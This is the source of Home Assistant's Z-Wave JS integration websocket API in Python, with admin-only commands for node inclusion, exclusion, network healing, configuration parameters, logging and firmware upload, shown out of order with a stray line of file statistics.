msg: dict,
node: Node,
) -> None:
"""Ping a Z-Wave JS node."""
result = await node.async_ping()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/add_node",
vol.Required(ENTRY_ID): str,
vol.Optional(SECURE, default=False): bool,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_add_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Add a node to the Z-Wave network."""
controller = client.driver.controller
include_non_secure = not msg[SECURE]
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
@callback
def node_added(event: dict) -> None:
node = event["node"]
interview_unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
unsubs.extend(interview_unsubs)
node_details = {
"node_id": node.node_id,
"status": node.status,
"ready": node.ready,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node added", "node": node_details}
)
)
@callback
def device_registered(device: DeviceEntry) -> None:
device_details = {
"name": device.name,
"id": device.id,
"manufacturer": device.manufacturer,
"model": device.model,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "device registered", "device": device_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("inclusion started", forward_event),
controller.on("inclusion failed", forward_event),
controller.on("inclusion stopped", forward_event),
controller.on("node added", node_added),
async_dispatcher_connect(
hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
),
]
result = await controller.async_begin_inclusion(include_non_secure)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_inclusion",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_inclusion(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Cancel adding a node to the Z-Wave network."""
controller = client.driver.controller
result = await controller.async_stop_inclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_exclusion",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_exclusion(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Cancel removing a node from the Z-Wave network."""
controller = client.driver.controller
result = await controller.async_stop_exclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/remove_node",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Remove a node from the Z-Wave network."""
controller = client.driver.controller
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("exclusion started", forward_event),
controller.on("exclusion failed", forward_event),
controller.on("exclusion stopped", forward_event),
controller.on("node removed", node_removed),
]
result = await controller.async_begin_exclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/replace_failed_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Optional(SECURE, default=False): bool,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_replace_failed_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Replace a failed node with a new node."""
controller = client.driver.controller
include_non_secure = not msg[SECURE]
node_id = msg[NODE_ID]
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
@callback
def node_added(event: dict) -> None:
node = event["node"]
interview_unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
unsubs.extend(interview_unsubs)
node_details = {
"node_id": node.node_id,
"status": node.status,
"ready": node.ready,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node added", "node": node_details}
)
)
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
@callback
def device_registered(device: DeviceEntry) -> None:
device_details = {
"name": device.name,
"id": device.id,
"manufacturer": device.manufacturer,
"model": device.model,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "device registered", "device": device_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("inclusion started", forward_event),
controller.on("inclusion failed", forward_event),
controller.on("inclusion stopped", forward_event),
controller.on("node removed", node_removed),
controller.on("node added", node_added),
async_dispatcher_connect(
hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
),
]
result = await controller.async_replace_failed_node(node_id, include_non_secure)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/remove_failed_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_failed_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Remove a failed node from the Z-Wave network."""
controller = client.driver.controller
node_id = msg[NODE_ID]
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [controller.on("node removed", node_removed)]
result = await controller.async_remove_failed_node(node_id)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/begin_healing_network",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_begin_healing_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Begin healing the Z-Wave network."""
controller = client.driver.controller
result = await controller.async_begin_healing_network()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_heal_network_progress",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_get_entry
async def websocket_subscribe_heal_network_progress(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Subscribe to heal Z-Wave network status updates."""
controller = client.driver.controller
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_event(key: str, event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "heal_node_status": event[key]}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("heal network progress", partial(forward_event, "progress")),
controller.on("heal network done", partial(forward_event, "result")),
]
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_healing_network",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_healing_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Stop healing the Z-Wave network."""
controller = client.driver.controller
result = await controller.async_stop_healing_network()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/heal_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_heal_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Heal a node on the Z-Wave network."""
controller = client.driver.controller
node_id = msg[NODE_ID]
result = await controller.async_heal_node(node_id)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_info",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_info(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Re-interview a node."""
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
result = await node.async_refresh_info()
connection.send_result(msg[ID], result)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_values",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_values(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Refresh node values."""
await node.async_refresh_values()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_cc_values",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Required(COMMAND_CLASS_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_cc_values(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Refresh node values for a particular CommandClass."""
command_class_id = msg[COMMAND_CLASS_ID]
try:
command_class = CommandClass(command_class_id)
except ValueError:
connection.send_error(
msg[ID], ERR_NOT_FOUND, f"Command class {command_class_id} not found"
)
return
await node.async_refresh_cc_values(command_class)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/set_config_parameter",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Required(PROPERTY): int,
vol.Optional(PROPERTY_KEY): int,
vol.Required(VALUE): vol.Any(int, BITMASK_SCHEMA),
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_set_config_parameter(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Set a config parameter value for a Z-Wave node."""
property_ = msg[PROPERTY]
property_key = msg.get(PROPERTY_KEY)
value = msg[VALUE]
try:
zwave_value, cmd_status = await async_set_config_parameter(
node, value, property_, property_key=property_key
)
except (InvalidNewValue, NotFoundError, NotImplementedError, SetValueFailed) as err:
code = ERR_UNKNOWN_ERROR
if isinstance(err, NotFoundError):
code = ERR_NOT_FOUND
elif isinstance(err, (InvalidNewValue, NotImplementedError)):
code = ERR_NOT_SUPPORTED
connection.send_error(
msg[ID],
code,
str(err),
)
return
connection.send_result(
msg[ID],
{
VALUE_ID: zwave_value.value_id,
STATUS: cmd_status,
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/get_config_parameters",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_get_config_parameters(
hass: HomeAssistant, connection: ActiveConnection, msg: dict, node: Node
) -> None:
"""Get a list of configuration parameters for a Z-Wave node."""
values = node.get_configuration_values()
result = {}
for value_id, zwave_value in values.items():
metadata = zwave_value.metadata
result[value_id] = {
"property": zwave_value.property_,
"property_key": zwave_value.property_key,
"configuration_value_type": zwave_value.configuration_value_type.value,
"metadata": {
"description": metadata.description,
"label": metadata.label,
"type": metadata.type,
"min": metadata.min,
"max": metadata.max,
"unit": metadata.unit,
"writeable": metadata.writeable,
"readable": metadata.readable,
},
"value": zwave_value.value,
}
if zwave_value.metadata.states:
result[value_id]["metadata"]["states"] = zwave_value.metadata.states
connection.send_result(
msg[ID],
result,
)
def filename_is_present_if_logging_to_file(obj: dict) -> dict:
"""Validate that filename is provided if log_to_file is True."""
if obj.get(LOG_TO_FILE, False) and FILENAME not in obj:
raise vol.Invalid("`filename` must be provided if logging to file")
return obj
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_log_updates",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_subscribe_log_updates(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Subscribe to log message events from the server."""
driver = client.driver
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
hass.async_create_task(driver.async_stop_listening_logs())
for unsub in unsubs:
unsub()
@callback
def log_messages(event: dict) -> None:
log_msg: LogMessage = event["log_message"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"type": "log_message",
"log_message": {
"timestamp": log_msg.timestamp,
"level": log_msg.level,
"primary_tags": log_msg.primary_tags,
"message": log_msg.formatted_message,
},
},
)
)
@callback
def log_config_updates(event: dict) -> None:
log_config: LogConfig = event["log_config"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"type": "log_config",
"log_config": dataclasses.asdict(log_config),
},
)
)
msg[DATA_UNSUBSCRIBE] = unsubs = [
driver.on("logging", log_messages),
driver.on("log config updated", log_config_updates),
]
connection.subscriptions[msg["id"]] = async_cleanup
await driver.async_start_listening_logs()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/update_log_config",
vol.Required(ENTRY_ID): str,
vol.Required(CONFIG): vol.All(
vol.Schema(
{
vol.Optional(ENABLED): cv.boolean,
vol.Optional(LEVEL): vol.All(
cv.string,
vol.Lower,
vol.In([log_level.value for log_level in LogLevel]),
lambda val: LogLevel(val), # pylint: disable=unnecessary-lambda
),
vol.Optional(LOG_TO_FILE): cv.boolean,
vol.Optional(FILENAME): cv.string,
vol.Optional(FORCE_CONSOLE): cv.boolean,
}
),
cv.has_at_least_one_key(
ENABLED, FILENAME, FORCE_CONSOLE, LEVEL, LOG_TO_FILE
),
filename_is_present_if_logging_to_file,
),
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_log_config(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Update the driver log config."""
await client.driver.async_update_log_config(LogConfig(**msg[CONFIG]))
connection.send_result(
msg[ID],
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/get_log_config",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_get_entry
async def websocket_get_log_config(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Get log configuration for the Z-Wave JS driver."""
connection.send_result(
msg[ID],
dataclasses.asdict(client.driver.log_config),
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/update_data_collection_preference",
vol.Required(ENTRY_ID): str,
vol.Required(OPTED_IN): bool,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_data_collection_preference(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Update preference for data collection and enable/disable collection."""
opted_in = msg[OPTED_IN]
update_data_collection_preference(hass, entry, opted_in)
if opted_in:
await async_enable_statistics(client)
else:
await client.driver.async_disable_statistics()
connection.send_result(
msg[ID],
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/data_collection_status",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_data_collection_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Return data collection preference and status."""
result = {
OPTED_IN: entry.data.get(CONF_DATA_COLLECTION_OPTED_IN),
ENABLED: await client.driver.async_is_statistics_enabled(),
}
connection.send_result(msg[ID], result)
class DumpView(HomeAssistantView):
"""View to dump the state of the Z-Wave JS server."""
url = "/api/zwave_js/dump/{config_entry_id}"
name = "api:zwave_js:dump"
async def get(self, request: web.Request, config_entry_id: str) -> web.Response:
"""Dump the state of Z-Wave."""
if not request["hass_user"].is_admin:
raise Unauthorized()
hass = request.app["hass"]
if config_entry_id not in hass.data[DOMAIN]:
raise web_exceptions.HTTPBadRequest
entry = hass.config_entries.async_get_entry(config_entry_id)
msgs = await dump.dump_msgs(entry.data[CONF_URL], async_get_clientsession(hass))
return web.Response(
body=json.dumps(msgs, indent=2) + "\n",
headers={
hdrs.CONTENT_TYPE: "application/json",
hdrs.CONTENT_DISPOSITION: 'attachment; filename="zwave_js_dump.json"',
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/version_info",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_get_entry
async def websocket_version_info(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Get version info from the Z-Wave JS server."""
version_info = {
"driver_version": client.version.driver_version,
"server_version": client.version.server_version,
"min_schema_version": client.version.min_schema_version,
"max_schema_version": client.version.max_schema_version,
}
connection.send_result(
msg[ID],
version_info,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/abort_firmware_update",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_abort_firmware_update(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Abort a firmware update."""
await node.async_abort_firmware_update()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_firmware_update_status",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_subscribe_firmware_update_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
"""Subsribe to the status of a firmware update."""
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
@callback
def forward_progress(event: dict) -> None:
progress: FirmwareUpdateProgress = event["firmware_update_progress"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"event": event["event"],
"sent_fragments": progress.sent_fragments,
"total_fragments": progress.total_fragments,
},
)
)
@callback
def forward_finished(event: dict) -> None:
finished: FirmwareUpdateFinished = event["firmware_update_finished"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"event": event["event"],
"status": finished.status,
"wait_time": finished.wait_time,
},
)
)
msg[DATA_UNSUBSCRIBE] = unsubs = [
node.on("firmware update progress", forward_progress),
node.on("firmware update finished", forward_finished),
]
connection.subscriptions[msg["id"]] = async_cleanup
connection.send_result(msg[ID])
class FirmwareUploadView(HomeAssistantView):
"""View to upload firmware."""
url = r"/api/zwave_js/firmware/upload/{config_entry_id}/{node_id:\d+}"
name = "api:zwave_js:firmware:upload"
async def post(
self, request: web.Request, config_entry_id: str, node_id: str
) -> web.Response:
"""Handle upload."""
if not request["hass_user"].is_admin:
raise Unauthorized()
hass = request.app["hass"]
if config_entry_id not in hass.data[DOMAIN]:
raise web_exceptions.HTTPBadRequest
entry = hass.config_entries.async_get_entry(config_entry_id)
client: Client = hass.data[DOMAIN][config_entry_id][DATA_CLIENT]
node = client.driver.controller.nodes.get(int(node_id))
if not node:
raise web_exceptions.HTTPNotFound
# Increase max payload
request._client_max_size = 1024 * 1024 * 10 # pylint: disable=protected-access
data = await request.post()
if "file" not in data or not isinstance(data["file"], web_request.FileField):
raise web_exceptions.HTTPBadRequest
uploaded_file: web_request.FileField = data["file"]
try:
await begin_firmware_update(
entry.data[CONF_URL],
node,
uploaded_file.filename,
await hass.async_add_executor_job(uploaded_file.file.read),
async_get_clientsession(hass),
)
except BaseZwaveJSServerError as err:
raise web_exceptions.HTTPBadRequest from err
return self.json(None)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/check_for_config_updates",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_check_for_config_updates(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Check for config updates."""
config_update = await client.driver.async_check_for_config_updates()
connection.send_result(
msg[ID],
{
"update_available": config_update.update_available,
"new_version": config_update.new_version,
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/install_config_update",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_install_config_update(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
"""Check for config updates."""
success = await client.driver.async_install_config_update()
connection.send_result(msg[ID], success)
| 29.640698 | 98 | 0.658344 | from __future__ import annotations
import dataclasses
from functools import partial, wraps
import json
from typing import Any, Callable
from aiohttp import hdrs, web, web_exceptions, web_request
import voluptuous as vol
from zwave_js_server import dump
from zwave_js_server.client import Client
from zwave_js_server.const import CommandClass, LogLevel
from zwave_js_server.exceptions import (
BaseZwaveJSServerError,
FailedCommand,
InvalidNewValue,
NotFoundError,
SetValueFailed,
)
from zwave_js_server.firmware import begin_firmware_update
from zwave_js_server.model.firmware import (
FirmwareUpdateFinished,
FirmwareUpdateProgress,
)
from zwave_js_server.model.log_config import LogConfig
from zwave_js_server.model.log_message import LogMessage
from zwave_js_server.model.node import Node
from zwave_js_server.util.node import async_set_config_parameter
from homeassistant.components import websocket_api
from homeassistant.components.http.view import HomeAssistantView
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.components.websocket_api.const import (
ERR_NOT_FOUND,
ERR_NOT_SUPPORTED,
ERR_UNKNOWN_ERROR,
)
from homeassistant.config_entries import ConfigEntry, ConfigEntryState
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import Unauthorized
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import DeviceEntry
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import (
CONF_DATA_COLLECTION_OPTED_IN,
DATA_CLIENT,
DATA_UNSUBSCRIBE,
DOMAIN,
EVENT_DEVICE_ADDED_TO_REGISTRY,
)
from .helpers import async_enable_statistics, update_data_collection_preference
from .services import BITMASK_SCHEMA
ID = "id"
ENTRY_ID = "entry_id"
ERR_NOT_LOADED = "not_loaded"
NODE_ID = "node_id"
COMMAND_CLASS_ID = "command_class_id"
TYPE = "type"
PROPERTY = "property"
PROPERTY_KEY = "property_key"
VALUE = "value"
SECURE = "secure"
CONFIG = "config"
LEVEL = "level"
LOG_TO_FILE = "log_to_file"
FILENAME = "filename"
ENABLED = "enabled"
FORCE_CONSOLE = "force_console"
VALUE_ID = "value_id"
STATUS = "status"
ENABLED = "enabled"
OPTED_IN = "opted_in"
def async_get_entry(orig_func: Callable) -> Callable:
@wraps(orig_func)
async def async_get_entry_func(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
entry_id = msg[ENTRY_ID]
entry = hass.config_entries.async_get_entry(entry_id)
if entry is None:
connection.send_error(
msg[ID], ERR_NOT_FOUND, f"Config entry {entry_id} not found"
)
return
if entry.state is not ConfigEntryState.LOADED:
connection.send_error(
msg[ID], ERR_NOT_LOADED, f"Config entry {entry_id} not loaded"
)
return
client = hass.data[DOMAIN][entry_id][DATA_CLIENT]
await orig_func(hass, connection, msg, entry, client)
return async_get_entry_func
def async_get_node(orig_func: Callable) -> Callable:
@async_get_entry
@wraps(orig_func)
async def async_get_node_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
node_id = msg[NODE_ID]
node = client.driver.controller.nodes.get(node_id)
if node is None:
connection.send_error(msg[ID], ERR_NOT_FOUND, f"Node {node_id} not found")
return
await orig_func(hass, connection, msg, node)
return async_get_node_func
def async_handle_failed_command(orig_func: Callable) -> Callable:
@wraps(orig_func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
*args: Any,
**kwargs: Any,
) -> None:
try:
await orig_func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
if unsubs := msg.get(DATA_UNSUBSCRIBE):
for unsub in unsubs:
unsub()
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@callback
def async_register_api(hass: HomeAssistant) -> None:
websocket_api.async_register_command(hass, websocket_network_status)
websocket_api.async_register_command(hass, websocket_node_status)
websocket_api.async_register_command(hass, websocket_node_state)
websocket_api.async_register_command(hass, websocket_node_metadata)
websocket_api.async_register_command(hass, websocket_ping_node)
websocket_api.async_register_command(hass, websocket_add_node)
websocket_api.async_register_command(hass, websocket_stop_inclusion)
websocket_api.async_register_command(hass, websocket_stop_exclusion)
websocket_api.async_register_command(hass, websocket_remove_node)
websocket_api.async_register_command(hass, websocket_remove_failed_node)
websocket_api.async_register_command(hass, websocket_replace_failed_node)
websocket_api.async_register_command(hass, websocket_begin_healing_network)
websocket_api.async_register_command(
hass, websocket_subscribe_heal_network_progress
)
websocket_api.async_register_command(hass, websocket_stop_healing_network)
websocket_api.async_register_command(hass, websocket_refresh_node_info)
websocket_api.async_register_command(hass, websocket_refresh_node_values)
websocket_api.async_register_command(hass, websocket_refresh_node_cc_values)
websocket_api.async_register_command(hass, websocket_heal_node)
websocket_api.async_register_command(hass, websocket_set_config_parameter)
websocket_api.async_register_command(hass, websocket_get_config_parameters)
websocket_api.async_register_command(hass, websocket_subscribe_log_updates)
websocket_api.async_register_command(hass, websocket_update_log_config)
websocket_api.async_register_command(hass, websocket_get_log_config)
websocket_api.async_register_command(
hass, websocket_update_data_collection_preference
)
websocket_api.async_register_command(hass, websocket_data_collection_status)
websocket_api.async_register_command(hass, websocket_version_info)
websocket_api.async_register_command(hass, websocket_abort_firmware_update)
websocket_api.async_register_command(
hass, websocket_subscribe_firmware_update_status
)
websocket_api.async_register_command(hass, websocket_check_for_config_updates)
websocket_api.async_register_command(hass, websocket_install_config_update)
hass.http.register_view(DumpView())
hass.http.register_view(FirmwareUploadView())
@websocket_api.require_admin
@websocket_api.websocket_command(
{vol.Required(TYPE): "zwave_js/network_status", vol.Required(ENTRY_ID): str}
)
@websocket_api.async_response
@async_get_entry
async def websocket_network_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
data = {
"client": {
"ws_server_url": client.ws_server_url,
"state": "connected" if client.connected else "disconnected",
"driver_version": client.version.driver_version,
"server_version": client.version.server_version,
},
"controller": {
"home_id": controller.home_id,
"library_version": controller.library_version,
"type": controller.controller_type,
"own_node_id": controller.own_node_id,
"is_secondary": controller.is_secondary,
"is_using_home_id_from_other_network": controller.is_using_home_id_from_other_network,
"is_sis_present": controller.is_SIS_present,
"was_real_primary": controller.was_real_primary,
"is_static_update_controller": controller.is_static_update_controller,
"is_slave": controller.is_slave,
"serial_api_version": controller.serial_api_version,
"manufacturer_id": controller.manufacturer_id,
"product_id": controller.product_id,
"product_type": controller.product_type,
"supported_function_types": controller.supported_function_types,
"suc_node_id": controller.suc_node_id,
"supports_timers": controller.supports_timers,
"is_heal_network_active": controller.is_heal_network_active,
"nodes": list(client.driver.controller.nodes),
},
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_status",
vol.Required(ENTRY_ID): str,
